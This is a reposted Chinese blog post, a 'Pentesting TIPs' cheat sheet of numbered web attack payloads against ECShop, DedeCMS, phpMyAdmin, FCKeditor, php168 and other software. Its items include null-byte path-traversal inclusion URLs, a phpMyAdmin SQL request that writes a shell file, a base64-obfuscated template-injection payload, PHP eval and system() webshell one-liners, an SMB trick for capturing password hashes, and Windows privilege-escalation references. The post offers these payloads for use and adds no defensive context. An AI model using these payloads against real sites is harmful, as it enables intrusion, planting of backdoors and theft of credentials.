Pentesting TIPs

简介:

1,ecshop magic_quotes_gpc = Off /js/calendar.php?lang=../index.php%00. 注册 然后上传gif欺骗文件 http://www.lpboke.com/js/calendar.php?lang=../data/feedbackimg/6_20101228vyrpbg.gif%00

 

2,dede 5.3以下 找后台 include/dialog/select_soft.php

 

3,phpmyamdin后台拿shell phpMyAdmin/sql.php?db=test&table=a&printview=1&sql_query=select%20cmd%20from+a%20into%20outfile

%20'E:\\test1.php';&display_text=F&token=dc49fb24f86a6dc2b996b5d4211cccb4

 

4,韩国某编辑器爆路径漏洞 webedit/PopupWin/Editor_InsertImage.php?upload=ok

 

5,token 漏洞补丁号 KB956572 Churrasco kb952004 传说的长老漏洞MS11-011 KB2393802

6,内网渗透时如果MYSQL不是SYSTEM启动的。。 而是由别的账号启动的话。本机开个共享,开个CAIN。。 MYSQL里面执行load_file('\\\\ip\c$\a.txt') 可以抓到目标服务器的HALF HASH.。

 

7,/fckeditor/_samples/default.html 可以找到上传后的路径

 

8,生成一句话到上级目录 <?php fputs(fopen("..".DIRECTORY_SEPARATOR."r.php","w"),"<?eval(\$_POST[r]);?>")?>

 

9,php168 member/post.php?only=1&showHtml_Type[bencandy][1]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x))}}&aid=1&job=endHTML c.php c

 

10,执行cmd命令的php语句 <?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?> http://localhost/a.php?cmd=dir

 

11,<?fputs(fopen('heige.php','w+'),'<?php eval($_POST[cmd])?>');?>

 

12,C:\windows\Microsoft.NET\Framework\v2.0.50727\aspnet_regiis.exe -i

 
 
 

Thx 末日。

 








本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/570710 ,如需转载请自行联系原作者
相关文章
|
算法
Tips In C
C语言中的使用操作 宏定义时使用do while防止语句的分离, 但是不使用与需要有返回值的语句, 这个时候可以参考第二条 宏定义时使用({}), ()加上{}的方式, 在代码中填写逻辑算法, 最后的一条语句就是该宏定义的返回值; 在使用该宏定义时需要以";"结尾
812 0
|
程序员 C++
|
SQL 数据库 C++
|
数据安全/隐私保护 Python 索引